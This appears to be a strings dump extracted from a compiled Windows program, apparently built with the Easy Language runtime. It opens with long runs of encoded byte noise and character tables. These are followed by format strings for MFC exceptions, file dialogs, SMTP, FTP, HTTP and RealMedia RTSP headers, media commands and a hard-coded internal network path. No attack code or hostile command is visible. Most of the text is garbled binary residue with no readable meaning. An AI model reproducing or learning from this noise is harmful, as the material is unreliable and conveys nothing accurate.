r=MBx,r-J.J.OBc7\Z[;YsJSvxfujvjyv/OSJ/J0R:q3WCc}sZ^[^^ocb{nw_JWhN[[;qqi7zFP L(nzKyy}L~SPdnrUTM_8|PQMrRwTJYU^XYM)n<v[LIp||Ih~t|g^W\^,p~LaM:ao[2Z%Q8\vX$QbMj\wpJp>P\]VTVSPm!M5_x_!T2NJhukUcPu!u'Y eKfquEe#y[`kvqKjY"uQWxQxjyj3Z_ooqve?ndb?P,zQu3g>iNr4[N|n]4g4W4w>MiZ0OYwfsYN*NHK'PKpGPEd`[ZU'W@nvxRuim<YFe#uTZ'b|{\qtJzhiNxieb9PrT&QN_t|*S,L`oeeUP|[f|~Kjm1^cy"TvOPVjUnqKz!e1UmOkm2U<Ub}-s[}0i'Qc}3Nd}Nz0J'w1O"f6|-rao.sF\kY`h(avU}O]^QYjdOr?wfb(bVcQmyi1V2^h` S\k/_CJ|nC}vk2OlY=Y_X8T>ko]p]q]r]>YF{3O}n dEZlX(Q)b<^5gp[bopq4Oq[1`%_Ry}g#fq{0K.rgM\hWg@wcP!Z=L)QL]~c*Q*h6jzyLfXvGTKYRYKSwX)Zxu^^/r)xHXAnAys]zj=v;a?MTtMfO|"{\`;tUZ2yr{v[_^r[\xnwhkzR<qZzjZFZAw6gGe,VG\)a*b&UWTPr{j]`s{=qgbW}HN7j@|g}ow5W:o]q3^Kh]xG{HU_W)]1i-zYvtz*xnf\L<ao`?i}|NfWaOfqtsd{ddyconO>v2`~| QzWH{Wb#Txp(Wga?SdoEWbkg|"dhbPfh{htte<tUt6_9|BnuJeobK$T`^}ZFd>h^`4vRj{yB`dJ7g}j]Y4Z*ni{K[5Z>q,SI{O_@SWcfoP|@iSu\l7w8jyQH\9j^q6W5O(Ynl*]"M.h=aQrAi|R5[gs~XQ|2m/t#{A| n%TrtYnJ{cM;X[ewxTv)WIKQfLp.XSy~U<X0r bhsBolm8g~Z>L|rkZXbVmQV3`R|HkASMpwORmXTI\qW;_%sMt?q1xziK{UJTyJwHVh|=s~n~gBS6S-Lzv2VXRXgÉg-pL{!k&TM{=U_q{v4^kUHe${9Ta^#d7Wnx5^RVUy:gUkwUgo>a.ziVnV;gKl3U4N%{na(wN{=X}{i|6OGm,n]L'vzf$u\}3mINho?a[zcK)w&{9\@qHmCo-VN}!ht{'UvqSf^L2xk\6}je`qL[M]HTmY%u{fTfH}!V?}S|!o<gnQUfri0_`X:|/}Npa[Ie4mC`Xc{i(j7}'{Biw}Ybl\"hpfx}y}?v'gWfsTITzVrW@ab[Xf=gOp>s,b7up`8}hc'T|hRzoxSV4UPppw3n:jSjIm ],e!}P_3lQ_mm8xzw x`t:T3dZi6^?Y@YoVLY*Ze_ew2Ly_`W;Tz}3Ls[R_JNZnddO{7OCnjN-baWuzIU,xYgismXDcqpehz`Dn^Y"k#kB|;j hb^om#hqO<Tj|>gr|4V.b7SLz\z5mca,h]hio=t8O[i,QGZIkLh7^<VeS]zVZ1JHZ&_3yRrDJKNuM0}(UAqibJ\4l@z({(PlZnY{`jo^zD`9OJUbW/b8WMhZv"oZb|vP{-QdM.Qm\Nhyp5N|f{WVPu]qw}vw[j{\iAYruE`TjBy<jERQ{@g%kz_"c9WCi}h/hSr){%XKUHP/QcWF`"VpmsWT|WZ_LTr0Q`L}[?sQp;|0b%f[b^_G`oraLjVBg6N@s~MR{xx{w?h7h6m:\4Lwq8hvJ$dVtf_'_g_AaDiK\Ei#o&k#Kic{Q$oko4P#Mfh%oLSmZ:WUreuoY4yTUO}c[aq6l~{WS1Q1K2Q2KBqat5yCaBawk(_JK9f^x*ywJ7m8SVrYTEnpr2J;\xq7lJe@v]}cTbLTweWCS&XAvv]@M\eKeDa0h0tjsnZ;W1b*W{V_dVJ(k~[Bv;o}TH`9h&o$MtT![\[][\nKKU|kNAMS{ yTu)Y]iM[N]CgLllyLK|`(TSmoXWrxJoZTVMYnXArS_pZjb}`xX/w6ZWJXryX_zoOBYRpQd7s`zlo2b=TNYbt)TBMZgYr*Y>X-\kb|VyJZTWt!L:O8uCYhPEcxk1r;O-SahlN4`c^w]2rvs[v~W_xrw)PZf&u<WcL[f]]3Qmo^Vtdoax]OheJ!\5`,|-|'X8m6[pV/s%MqZ(XdL4QXJrZ'u(u&flUxUsZFcd^e^5Q6Q7Q3r^iSp4rTpdKT{fujcf^T_yx.p8Q_VWP!|noX\_i]e{}I`IV*TLe`iXP"|>T3bg^<\6RUu!N)uy]z]Up_vZrkdqr9l|}*aYJoo*uyl-xBrCvRW"yVpzp`vsiCr T3J&MCMZMOYDv]nDg4bb_[g1h.|Mekz<ObOvMpo>tMT8s!irrksWpWO_O@hAhcO"i*PAs PdT<o!X_YWs=\eLqmbq[T5bfJ.SfLSqguZJn{Eai_^nBw"X,]/p=V a6yuTIP'olbj[LNhuUwMS~s5P~`{_]f$hMK(o4nXZ9Q)_0sDL7N)oU_WmFn=oV|t[*o9xiuYcFa?Th^jpBs/S[JW|XmGaXt3V-]>UCq_nkVYtfW7Z{]O]#XYZXpDoXaTqrm[U\UDsWK6bqoU{XSP]Yp3K]U'M,P:QDq3eu{ai`}<|"Z#Z!RoRmbi^\N5rdPQ]Ha7[c_9mEqOs W,akcGnIazJ{pazZpgLtZ?LmN)UbzePVk_l|_Vwj^4K>o5L=Oro7bhL|p`VFq8b k5KQXNtwsFW;Q*wJmSWzXEvLQ|]}_eyJ`}r0SstIZ^f:xPh{XUj#VFv[r|d2hZZ\rV{2i-nczn\ju`f}p,WEu`ne[^]pY#iyqDrK`$i9b1ck|(M6L[p:f)MCsYa oEgi`Es@T?U.]|y@L"e8NRXVy*qQNGvk[~_aXswgW~T<QOe6K8ZDM>V:bXOL`yk}}hWXKbi:hGcMlNl?V'cV_h}an(v}];xQhWynNOl%iUVEM:m=Q>O;l1RiLDY|i>Q<l-e0wjLDS@V}V!a=^)v$Z$VFu"aFiEritlVSk=l\bk^\p?kNW?Q u}y\JFM6r~]7L8[iP]N@k"}KxVj0qN[CwO[$K`xW{Jk!`MN\TX}vR7rvz*vwzfX1tRhEJkLnb;b-waxls!^}dlc/]0]7KSh#a`R~p&irKsmY\M`Zw9[.L[ZGM1]/X#coNsr3xN`}ulkESl|[RkT"^fe0pDUtmmcBhum|W;m v8rHvfS]r?O,k@O(fi}AO_`l^"`?tobqYGq8K~y:[uZlv\ZdzO`2])fsomszkfy]J^U^Jd_}f,uudciKmdOSX3]lT9r7_NKX{YPR]tw\g%d#|;[:r}iJPVuEY4d'm=j~fDw-u`Y4JbxBO>l4eHMHnHgIM7yhqrYu[5JFYIX Y<mTXZ\<bm|`l~RGi*fpb;z.u*{{l?lX|eTCybniWvmm^lLncThxz4]5d0XUXjt9NaVRO6P"NnsxsL\KP$|JMTW#^`dIn]b~u,TQUpXCxWjWu?X@}-k*U(gJngJcx]TXjY{wm5e-Pqq=bHcUY*_<[dxzq6eosZ{`a,Yku6`HiOKIcn^>bo\%Vqb~V!Y@X[\=m8_%j-WysxmGuJack^rLxYjFSf[/upN~i6{rbrO9wsYKa]Z9Z{k9Kym``@t<}1_oc#`9}1pKM>m@UpczmdimU]gvT7eg[?bKntW]p N^gVVLa3hne"\P`5U!U[{KysK%tHzWVei\{P}v{%Z=[blwM^pIvo^1Sn|ChHqqNmytr6d9up\qc%h;r$^LZiJZcY|ZjDy$c]{JoDhLUWk-Y {YS"U^vvZQ`(iyu/z|kj`2cEUcqnULMYmAXlzkq<zbfezzb6J7d[jzu,{CO}kzx9_qa$R{uZP[P>j1Y7JgSex2S@b_reM,yMM.n.VjW`g.kYOM\{mp^kW%^W_P[Q[#U2p\\hJfxN\\jR[3i[w(c.Wa`:KQe\PAUJX)c$`)iGS]\.x8L.PrXJc/L-TQvLPFJBU:NGJ0zX_:uketo5]*Mrcw{Pw:}a}~v@QEh8dhaALmR>[b`IzMa8J`rIqq^_pDxLnr^IgsbagKcLcxO,o~}%|1zY_R`ZtJq#N<rcl%` w/k^e$a MtY&hNMiao|c`Ab$N&^~k]k`p[ttbHSkt5nXu_UeV0kctMctt2zuo_J1k?mI}&d$y3plegQGYWd]jwT:ZMZLyZa?[ELPl;Ks^*iHYcn=WDOMP&|{qR}AQ[cISO\mL'^;f!l9L^{bgAT(\BbXsSeYsFs[M,MC|gTBQ%yUhNcJTZ__{cg{xOc0ugXIY/xvo6]/nxM8^'||w1w;N!tMn.aCl~O?xbXhS(^dtBluYEyS]qV|lp|@m9Jdnar9^rVt^[_S[gzcXAt7]ur.TsV8]EO__>r!vKk|qGsk`|m[aenu^SzKq/P9]CQ1uFjap,vYukp:]?rEw"[vr:JuweKfnS`%NXV/TIiNSBtfK!q2k"q3k4ptK0T2s7{lugn2tmusObpNnLq8euWsceOFO3sXdyOZOMzcfbrnu;J\crNYV0netBXP\nL`UJvJ}VXOt&V>\T[GW~rMqCb^\_\-o f]y?j.oPtsN,f^NyUtcPM8U}w)\v^*\cr4i\RfivcJgNPwZ<Jhn^Zwr{b&L;ZinZu\wjaAN1T1}=f-{gxNabwouGO2ToLhTOnWw&`AV\acpdqq\'VutNqdr0Pol:y5kmTDbgi4k!j<x&NFyZ|3T9S^j iaaOSvt@jOa:Ljndp4snT@reqCtT`6k!WhK-y-idX3zEb=|Dl1X \$Uik;hWX.{aQ@[>uw^{JFwHOPaPntitNMU[O;],Nhi4TGd[uAz)^xTwo3S7kxo\uLmU[OqPq2u.Y,UFb#}e{ _ub-v3u5p%a]u"l}m4u8{#[JVYKTezs8k7`lWlq/eaUmWQQrayo<]\vepDtii{soT"L~w<_Mk7PBV-h/o%KiKhzFLgfGj$[IO|bzo^kHu^TU`0oGb/YgyegJOQaHb{oyzr\'`hxjK<KbV^u_u6nvbJS|oDQ1oEQ^PaY8`QM9sLg(V'N5THd4S9kuK]v#qGLJipa`u/{QK`{erpllpknKipL/W!su|$qV`2oQt!wQq|J}JNNHs:s~m&Zl`MxRKNkXyYy`JJZ&KHJnyl[1PoUsf"gYdadD|oytOfw<NEt#\=]Ft!xVhA[fp9dmv.y>]0WhX=KZyNxpym`3c3tBjfr6pV[dkgrUW6ThyAWUejiLWiSIb[|-M0L"jvd@P7p!nvWJbKbOz_kKV4tMmRd)j:d"sRMKvfqAm<hQngpLb*dauZmnWqQkilid`'ZT]#jCVtV_Z3oMb}ohrEogg}WNg\_GyvY,_ZV$\8pzUwdDVlt~o!p*^<Z|XTzel(|flKX9{SdyMSOjJTO=xGt_j[y7TekRa$jBza{mz"pqL#zwbNbuikahgWhxZKTvwEViTzzrL]w:^(N9p~dIdTdCj4o>Wb{SM5oiz&y=_Gw}x|x ^h[]cbaFQPvfkyZGlx^ix^cuNCzWeHlIs;d.f6o?\=NCXOPzOJsW`GQ.i=hDzObEz8y`\0{)X_e'ynvLvxbql`ZRqLRKO=J?]ovy^4z-Ugq>^@\HQIQ>xvKyTbuSaiX~xLO$}vNPzsL>f.vpUJQ>|qUiM5zPbwtTM#g%[Qb"Wcw&j!PZNk{&[^[eX`j*X`e[VFojxUdwNX`oWmtfMtLcuJda\Hy?|'hDX>K.\wWhp@]MOs\0Yif<dDjldedx{;L=d\MwY_]NmPY#eMy.MNO/vS}mk\V$e6U]Viy$gcVKQdVrUz^xWjXUO}X XK}\|(`sUY}#LyYjSuuGoZS=Z(h/\#pUM)`,^:p1n2nMvRnFVe`;saeKd#WB[~JOO!0"0#0$0%0&0'0(0)0*0 0,0-0.0/000102030405060708090:0;0<0=0>0?0@0A0B0C0D0E0F0G0H0I0J0K0L0M0N0O0P0Q0R0S0T0U0V0W0X0Y0Z0[0\0]0^0_0`0a0b0c0d0e0f0g0h0i0j0k0l0m0n0o0p0q0r0s0t0u0v0w0x0y0z0{0|0}0~0!1"1#1$1%1&1'1(1)1*1 1,1-1.1/101112131415161718191:1;1<1=1>1?1@1A1B1C1D1E1F1G1H1I1J1K1L1M1N1O1P1Q1R1S1T1U1V1W1X1Y1Z1[1\1]1^1_1`1a1b1c1d1e1f1g1h1i1j1k1l1m1n1o1p1q1r1s1t1u1v1w1x1y1z1{1|1}1~1!2"2#2$2%2&2'2(2)2*2 2,2-2.2/202122232425262728292:2;2<2=2>2?2@2A2B2C2D2E2F2G2H2I2J2K2L2M2N2O2P2Q2R2S2T2U2V2W2X2Y2Z2[2\2]2^2_2`2a2b2c2d2e2f2g2h2i2j2k2l2m2n2o2p2q2r2s2t2u2v2w2x2y2z2{2|2}2~2!3"3#3$3%3&3'3(3)3*3 3,3-3.3/303132333435363738393:3;3<3=3>3?3@3A3B3C3D3E3F3G3H3I3J3K3L3M3N3O3P3Q3R3S3T3U3V3W3X3Y3Z3[3\3]3^3_3`3a3b3c3d3e3f3g3h3i3j3k3l3m3n3o3p3q3r3s3t3u3v3w3x3y3z3{3|3}3~3!4"4#4$4%4&4'4(4)4*4 4,4-4.4/404142434445464748494:4;4<4=4>4?4@4A4B4C4D4E4F4G4H4I4J4K4L4M4N4O4P4Q4R4S4T4U4V4W4X4Y4Z4[4\4]4^4_4`4a4b4c4d4e4f4g4h4i4j4k4l4m4n4o4p4q4r4s4t4u4v4w4x4y4z4{4|4}4~4!5"5#5$5%5&5'5(5)5*5 5,5-5.5/505152535455565758595:5;5<5=5>5?5@5A5B5C5D5E5F5G5H5I5J5K5L5M5N5O5P5Q5R5S5T5U5V5W5X5Y5Z5[5\5]5^5_5`5a5b5c5d5e5f5g5h5i5j5k5l5m5n5o5p5q5r5s5t5u5v5w5x5y5z5{5|5}5~5!6"6#6$6%6&6'6(6)6*6 6,6-6.6/606162636465666768696:6;6<6=6>6?6@6A6B6C6D6E6F6G6H6I6J6K6L6M6N6O6P6Q6R6S6T6U6V6W6X6Y6Z6[6\6]6^6_6`6a6b6c6d6e6f6g6h6i6j6k6l6m6n6o6p6q6r6s6t6u6v6w6x6y6z6{6|6}6~6!7"7#7$7%7&7'7(7)7*7 7,7-7.7/707172737475767778797:7;7<7=7>7?7@7A7B7C7D7E7F7G7H7I7J7K7L7M7N7O7P7Q7R7S7T7U7V7W7X7Y7Z7[7\7]7^7_7`7a7b7c7d7e7f7g7h7i7j7k7l7m7n7o7p7q7r7s7t7u7v7w7x7y7z7{7|7}7~7!8"8#8$8%8&8'8(8)8*8 8,8-8.8/808182838485868788898:8;8<8=8>8?8@8A8B8C8D8E8F8G8H8I8J8K8L8M8N8O8P8Q8R8S8T8U8V8W8X8Y8Z8[8\8]8^8_8`8a8b8c8d8e8f8g8h8i8j8k8l8m8n8o8p8q8r8s8t8u8v8w8x8y8z8{8|8}8~8!9"9#9$9%9&9'9(9)9*9 9,9-9.9/909192939495969798999:9;9<9=9>9?9@9A9B9C9D9E9F9G9H9I9J9K9L9M9N9O9P9Q9R9S9T9U9V9W9X9Y9Z9[9\9]9^9_9`9a9b9c9d9e9f9g9h9i9j9k9l9m9n9o9p9q9r9s9t9u9v9w9x9y9z9{9|9}9~9!:":#:$:%:&:':(:):*: :,:-:.:/:0:1:2:3:4:5:6:7:8:9:::;:<:=:>:?:@:A:B:C:D:E:F:G:H:I:J:K:L:M:N:O:P:Q:R:S:T:U:V:W:X:Y:Z:[:\:]:^:_:`:a:b:c:d:e:f:g:h:i:j:k:l:m:n:o:p:q:r:s:t:u:v:w:x:y:z:{:|:}:~:!;";#;$;%;&;';(;);*; ;,;-;.;/;0;1;2;3;4;5;6;7;8;9;:;;;<;=;>;?;@;A;B;C;D;E;F;G;H;I;J;K;L;M;N;O;P;Q;R;S;T;U;V;W;X;Y;Z;[;\;];^;_;`;a;b;c;d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s;t;u;v;w;x;y;z;{;|;};~;!<"<#<$<%<&<'<(<)<*< <,<-<.</<0<1<2<3<4<5<6<7<8<9<:<;<<<=<><?<@<A<B<C<D<E<F<G<H<I<J<K<L<M<N<O<P<Q<R<S<T<U<V<W<X<Y<Z<[<\<]<^<_<`<a<b<c<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s<t<u<v<w<x<y<z<{<|<}<~<!="=#=$=$=&='=(=)=*= =,=-=.=/=0=1=2=3=4=5=6=7=8=9=:=;=<===>=?=@=A=B=C=D=E=F=G=H=I=J=K=L=M=N=O=P=Q=R=S=T=U=V=W=X=Y=Z=[=\=]=^=_=`=a=b=c=d=e=f=g=h=i=j=k=l=m=n=o=p=q=r=s=t=u=v=w=x=y=z={=|=}=~=!>">#>$>%>&>'>(>)>*> >,>->.>/>0>1>2>3>4>5>6>7>8>9>:>;><>=>>>?>@>A>B>C>D>E>F>G>H>I>J>K>L>M>N>O>P>Q>R>S>T>U>V>W>X>Y>Z>[>\>]>^>_>`>a>b>c>d>e>f>g>h>i>j>k>l>m>n>o>p>q>r>s>t>u>v>w>x>y>z>{>|>}>~>!?"?#?$?%?&?'?(?)?*? ?,?-?.?/?0?1?2?3?4?5?6?7?8?9?:?;?<?=?>???@?A?B?C?D?E?F?G?H?I?J?K?L?M?N?O?P?Q?R?S?T?U?V?W?X?Y?Z?[?\?]?^?_?`?a?b?c?d?e?f?g?h?i?j?k?l?m?n?o?p?q?r?s?t?u?v?w?x?y?z?{?|?}?~?!@"@#@$@%@&@'@(@)@*@ @,@-@.@/@0@1@2@3@4@5@6@7@8@9@:@;@<@=@>@?@@@A@B@C@D@E@F@G@H@I@J@K@L@M@N@O@P@Q@R@S@T@U@V@W@X@Y@Z@[@\@]@^@_@`@a@b@c@d@e@f@g@h@i@j@k@l@m@n@o@p@q@r@s@t@u@v@w@x@y@z@{@|@}@~@!A"A#A$A%A&A'A(A)A*A A,A-A.A/A0A1A2A3A4A5A6A7A8A9A:A;A<A=A>A?A@AAABACADAEAFAGAHAIAJAKALAMANAOAPAQARASATAUAVAWAXAYAZA[A\A]A^A_A`AaAbAcAdAeAfAgAhAiAjAkAlAmAnAoApAqArAsAtAuAvAwAxAyAzA{A|A}A~A!B"B#B$B%B&B'B(B)B*B B,B-B.B/B0B1B2B3B4B5B6B7B8B9B:B;B<B=B>B?B@BABBBCBDBEBFBGBHBIBJBKBLBMBNBOBPBQBRBSBTBUBVBWBXBYBZB[B\B]B^B_B`BaBbBcBdBeBfBgBhBiBjBkBlBmBnBoBpBqBrBsBtBuBvBwBxByBzB{B|B}B~B!C"C#C$C%C&C'C(C)C*C C,C-C.C/C0C1C2C3C4C5C6C7C8C9C:C;C<C=C>C?C@CACBCCCDCECFCGCHCICJCKCLCMCNCOCPCQCRCSCTCUCVCWCXCYCZC[C\C]C^C_C`CaCbCcCdCeCfCgChCiCjCkClCmCnCoCpCqCrCsCtCuCvCwCxCyCzC{C|C}C~C!D"D#D$D%D&D'D(D)D*D D,D-D.D/D0D1D2D3D4D5D6D7D8D9D:D;D<D=D>D?D@DADBDCDDDEDFDGDHDIDJDKDLDMDNDODPDQDRDSDTDUDVDWDXDYDZD[D\D]D^D_D`DaDbDcDdDeDfDgDhDiDjDkDlDmDnDoDpDqDrDsDtDuDvDwDxDyDzD{D|D}D~D!E"E#E$E%E&E'E(E)E*E E,E-E.E/E0E1E2E3E4E5E6E7E8E9E:E;E<E=E>E?E@EAEBECEDEEEFEGEHEIEJEKELEMENEOEPEQERESETEUEVEWEXEYEZE[E\E]E^E_E`EaEbEcEdEeEfEgEhEiEjEkElEmEnEoEpEqErEsEtEuEvEwExEyEzE{E|E}E~E!F"F#F$F%F&F'F(F)F*F F,F-F.F/F0F1F2F3F4F5F6F7F8F9F:F;F<F=F>F?F@FAFBFCFDFEFFFGFHFIFJFKFLFMFNFOFPFQFRFSFTFUFVFWFXFYFZF[F\F]F^F_F`FaFbFcFdFeFfFgFhFiFjFkFlFmFnFoFpFqFrFsFtFuFvFwFxFyFzF{F|F}F~F!G"G#G$G%G&G'G(G)G*G G,G-G.G/G0G1G2G3G4G5G6G7G8G9G:G;G<G=G>G?G@GAGBGCGDGEGFGGGHGIGJGKGLGMGNGOGPGQGRGSGTGUGVGWGXGYGZG[G\G]G^G_G`GaGbGcGdGeGfGgGhGiGjGkGlGmGnGoGpGqGrGsGtGuGvGwGxGyGzG{G|G}G~G!H"H#H$H%H&H'H(H)H*H H,H-H.H/H0H1H2H3H4H5H6H7H8H9H:H;H<H=H>H?H@HAHBHCHDHEHFHGHHHIHJHKHLHMHNHOHPHQHRHSHTHUHVHWHXHYHZH[H\H]H^H_H`HaHbHcHdHeHfHgHhHiHjHkHlHmHnHoHpHqHrHsHtHuHvHwHxHyHzH{H|H}H~HPKVKgKOMhM-N{O"P8PPP]PTQUQXQ[Q\Q]Q^Q_Q`QbQcQdQeQfQhQiQjQkQmQoQpQrQvQzQ|Q}Q~Q"R#R'R(R)R*R R-R2R>RBRCRDRFRGRHRIRJRKRMRNRORPRQRRRSRTRURVRWRYRZR^R_RaRbRdReRfRgRhRiRjRkRpRqRrRsRtRuRwRxRfT|T%U U.U8VMVKWdWE[d[%\%]U]t]|^~^3_a_h_q`-amauc!d)d.e1e2e9e;e<eDeNePeReVeze{e|e~e!f$f'f-f/f0f1f3f7f8f<fDfFfGfJfRfVfYf\f_fafdfefffhfjfkflfofqfrfufvfwfyf!g&g)g*g,g-g0g?gAgFgGgKgMgOgPgSg_gdgfgwgghhhphqhwhyh{h~h'i,iLiwiAjejtjwj|j~j$k'k)k*k:k;k=kAkBkFkGkLkOkPkQkRkXk&l'l*l/l0l1l2l5l8l:l@lAlElFlIlJlUl]l^laldlglhlwlxlzl!m"m#mnm[n=rzr1s'tnttvvv8wHwSw[xpx!z"zfz)|!#"###$#%#&#'#(#)#*# #,#-#.#/#0#1#2#3#4#5#6#7#8#9#:#;#<#=#>#?#@#A#B#C#D#E#F#G#H#I#J#K#L#M#N#O#P#Q#R#S#T#U#V#W#X#Y#Z#[#,!]#^#_#`#a#b#c#d#e#f#g#h#i#j#k#l#m#n#o#p#q#r#s#t#u#v#w#x#y#z#{#|#}#&"K!L!~!~#M!\#
s&t*t)t.tbt
.GIzI}I
$ ' / 1 1 4 4 6 : <
0 0*0=0?0@0
CUWeXeYeZe[e\e`eaecedegeielene
ZT%f%W%`%l%c%Z%i%]%R%d%U%^%j%a%X%g%[%S%e%V%_%k%b%Y%h%\%Q%P%m%n%p%o%
;L0LBLCLQC%sJ
M.Nr<\O
U.Wex
m.dOl5Y
!"#$%&'()* ,-./0123456789:;~
!"#$%&'()* ,-./0123456789:;<=>?
!"$%&()* ,-.1
!"#&')* /01236
!"#%&'()* ,-
!$&'()* ,-/01
!"#$%&) -./0123
!$&'()*-/236
!#$%&'(),012345789;<=
!"#$%&'()*
"#$%&'()* ,-./0123
!"#$%&'()* ,
!"#&(*,-./234
!"#$%&'()*,-
!"#$%&'()* ,-.
!"$%&'() ,-./012
!"#$%&'()* 
!#%&'()* ,-
"#$%&'( ,-01
!"$%&()* ,-.156789:<=>@
"#%&')* ,-./246789:
"#$%&'()* ,-.
!"#$%'() ,-/012345
!"#$%&')* 
!"#$%&()* ,-./0
!"#$%&'()* ,-./013
!#$%'() ,-.
!"#%&'()*-.012456
!"#$%&'()* ./
!"#$%&) -./0125689:<
!"#$%&()* ,-./01
!"#$%&'*./0123
!#$%&'(),01234578
"#$%&'( -/01
!"#$%&'()* ,-./0
!"#$%'()* ,-
!"#&(* ,-./12
!"#$%&'()* ,-
!#$%'() ,-./01345
!#%&'()*-.01256
"&'()* -./012345678
!#$%&'(),.012345789;
"#$&'()* ,-./01234
!"#%&')* ,
!$%'() ,-.
!"#%&'()*-.01467
!"#$%&'()*-.01245
#'() ,/02346789:;<?
!$()* ,-01345
!"%&)* ,-.012345
!"#$') ,-./02345
!"#%&')* -.
#%'()* ,./0123456
!"$%&()* ,-.013
!"#$%&'()* ,-./
"$%&'(),-/01345
!#$%&'(),.01234589;
!"#$%&()* ,-./0145
!"#$%&'() -./0125689
!"#$%') ,-./023
"#$%'(* -/012346
!#$%&'()* ,-.012
!"$%&()* ,-.0135678
!#$%'()* ,-012456789<=
!"#$%&'()
!"#$%&'()* ,-./0123456789:;<=
!"#$%&'()* ,-./0123456789
!"#$%&'()* ,-./012345
!"#$%&'()* ,-./01
Z%T%i%f%`%P%l%}
O!wexe
ôfpf
wexe
%S%T%_%
%S%_%
%S%T%
ôfp
!2,4,6,7
! !!!"!#!$!
{!|!}!~!
" "!"""#"$"'" ","-"."/"0"
0$1$3$4$
%!%"%#%$%%%'%
B%D%E%F%
Q%S%T%U%V%
9&:&;&<&
' '!'"'$'%'&'''(')'*' ','-'.'/'0'2'3'4'5'6'8'9':'<'='>'?'@'
-(.(/(0(1(
8(:(;(=(
(*.*/*0*1*2*3*4*5*6*7*9*:*;*<*
4 5 6 7 8 9 
!,",#,$,%,&,',
-!-"-#-$-%-&-
4-5-6-8-
#.$.%.&.'.(.).
 ...0.1.2.5.7.
WINDOWS-1251
WINDOWS-1252
WINDOWS-1256
WINDOWS-1255
WINDOWS-1258
WINDOWS-1253
WINDOWS-1250
WINDOWS-1257
WINDOWS-1254
ISO_646.IRV:1991
WINDOWS-874
CSSHIFTJIS
iphlpapi.dll
MPR.dll
%x.tmp
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
VVV.dywt.com.cn
\StringFileInfo\%s\Comments
\StringFileInfo\%s\ProductVersion
\StringFileInfo\%s\ProductName
\StringFileInfo\%s\OriginalFilename
\StringFileInfo\%s\LegalTrademarks
\StringFileInfo\%s\LegalCopyright
\StringFileInfo\%s\InternalName
\StringFileInfo\%s\FileDescription
\StringFileInfo\%s\CompanyName
\StringFileInfo\%s\FileVersion
000%x
(*.avi)|*.avi
RICHED32.DLL
RICHED20.DLL
WPFT532.CNV
WPFT632.CNV
EXCEL32.CNV
write32.wpc
Windows Write
mswrd632.wpc
Word for Windows 6.0
wword5.cnv
Word for Windows 5.0
mswrd832.cnv
mswrd632.cnv
Word 6.0/95 for Windows & Macintosh
html32.cnv
keywords
(*.htm;*.html)|*.htm;*.html
its:%s::%s
1.0.6
\shell32.dll
%d%d%d
rundll32.exe shell32.dll,
<tr><td bgcolor=buttonface>Y</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>X</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Height</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Width</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>RECT</td><td bgcolor=white>(%d, %d)-(%d, %d)</td></tr>
<tr><td bgcolor=buttonface>Styles</td><td bgcolor=white>0xX</td></tr>
<tr><td bgcolor=buttonface>Control ID</td><td bgcolor=white>%d</td></tr>
<tr><td bgcolor=buttonface>Handle</td><td bgcolor=white>0xX</td></tr>
<table><tr><td><icon handle=0x%X></td><td>%s</td></tr></table>
burlywood
\winhlp32.exe
%s\wavdest.ax
window %s handle %d
play %s from %d
play %s
status %s position
status %s mode
close %s
seek %s to start
stop %s
pause %s
resume %s
status %s length
set %s time format milliseconds
status %s window handle
Bag pipe
D51BD5A1-7548-11CF-A520-0080C77EF58A
3C78B8E2-6C4D-11D1-ADE2-0000F8754B99
;3 #>6.&
'2, / 0&7!4-)1#
[%s:%d]
Range: bytes=%s-
[%s:%d]
PASS %s
PASS ******
USER %s
E:\dev\e\static_link\static_libs\source\downlib\mystrlib.cpp
SIZE %s
PORT
[%s:%d],
User-Agent: %s
Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Host: %s
GET %s HTTP/1.1
Cookie: %s
%d, %s
\\192.168.0.129\TCP\1037
NSPlayer/9.0.0.2980; {%s}; Host: %s
rmff_fix_header: assuming data.size=%i
rmff_fix_header: assuming data.num_packets=%i
rmff_fix_header: assuming prop.num_packets=%i
rmff_fix_header: setting prop.data_offset from %i to %i
rmff_fix_header: correcting prop.num_streams from %i to %i
rmff_fix_header: correcting prop.size from %i to %i
%s %s %s
Session: %s
Cseq: %u
%*s %s
%*s %u
CSeq: %u
rtsp://%s:%i
rtsp://%s:%i/%s
ClientID: Linux_2.4_6.0.9.1235_play32_RN01_EN_586
GUID: 00000000-0000-0000-0000-000000000000
[%s:%d]
User-Agent: RealMedia Player Version 6.0.9.1235 (linux-2.0-libc6-i386-gcc2.95)
Range: npt=%s-
%s/streamid=1
%s/streamid=0
Transport: x-pn-tng/tcp;mode=play,rtp/avp/tcp;unicast;mode=play
If-Match: %s
RealChallenge2: %s, sd=%s
Title: %s
Copyright: %s
Author: %s
real: Content-length for description too big (> %uMB)!
Require: com.real.retain-entity-for-setup
SupportsMaximumASMBandwidth: 1
Bandwidth: %u
Challenge1: %s
hash output: %x %x %x %x
hash input: %x %x %x %x
stream=%u;rule=%u,
Illegal character '%c' in input.
VVV.dywt.com.cn-MenuEx-Mask
VVV.dywt.com.cn-MenuEx-OldProc
VVV.dywt.com.cn-MenuEx-MenuShown
VVV.dywt.com.cn-MenuEx-ActiveBarItem
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
